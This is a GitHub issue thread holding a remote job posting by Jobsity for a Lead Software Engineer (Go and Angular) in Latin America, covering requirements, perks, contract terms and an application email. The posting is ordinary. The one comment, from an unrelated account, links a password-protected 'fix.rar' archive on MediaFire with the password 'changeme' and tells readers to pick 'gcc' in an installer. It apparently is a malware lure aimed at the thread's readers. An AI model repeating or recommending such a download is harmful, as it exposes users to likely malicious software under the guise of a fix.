### ISSUE TITLE
[FULLY REMOTE] Lead Software Engineer (Go+Angular) at Jobsity

### ISSUE THREAD

**Issue by AngelaBarboza** [backend-br/vagas#11629]
## About [Jobsity](https://www.jobsity.com/)💡
We’ve been around for about 10 years. We are a NY based staffing company that works with lots of different clients in the US, Canada and Europe.
Most of our developers, data engineers, and Quality Assurance engineers are located in Latin America, although we have a presence in more than 15 countries.
We have connected more than 400 people with international employment. We focus more on quality and long-term partnerships, between Jobsity, our candidates (you), and our clients. In fact, we only work with the top 3% of talents in LATAM.
As a member of the Jobsity Recruitment team, we are going to work to find you the right position depending on what is important to you.

## Requirements✔

🌠 Must reside in LATAM region or Canada. 
🌠 Over 10 years of experience, with full-stack modern web development expertise across both front-end and back-end technologies.
🌠 Accessibility experience.
🌠 Back-end: 
◾️ At least 4 years of recent professional experience in Golang development.
◾️ Experience with Java, or Node.js. 

🌠 Front-end: 
◾️ At least 4 years of recent professional experience in Angular development. 
◾️ Experience with TypeScript, NgRx/RxJS, and Playwright. 

🌠 At least 2 years of recent professional experience in leadership roles.
🌠 CI/CD and Infrastructure: CircleCI, Sonarqube, Docker, Kubernetes, Github and NewRelic. 
🌠 Amazon Web Services (AWS): ECS, RDS, Lambda, among other services. 
🌠 Collaboration: JIRA, Confluence, Zoom, Slack, and Office 365. 
🌠 Databases: Relational databases such as MySQL and PostgreSQL; NoSQL databases such as DynamoDB.
🌠 Exceptional communication skills: Fluent in English with strong verbal, written, interpersonal, and organizational abilities. Capable of effectively interacting with UX and technical teams, business stakeholders, and documenting software clearly for diverse audiences.

## Modality
👨‍💻 Fully remote
PS: position available only for engineers located in LATAM 🗺

## Perks that Jobsity offers!💎

🔹Yearly paid vacation.
🔹Paid local holidays.
🔹Learning budget.
🔹Financing program for equipment and home office supplies.
🔹Bonuses for referrals and more!

## Type of contract📜

This is a full-time position as contractor🕘
....with USD payment 💰
....long-term relationship 🤝
...within an international team 👩‍💻 👨‍💻
...and working on international client projects! 🌎

## How to apply🤔

- Send an email to [angela.barboza@jobsity.com](mailto:angela.barboza@jobsity.com) with your CV/LinkedIn attached - Send in the subject: Lead Software Engineer (Go+Angular) - GitHub📧

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
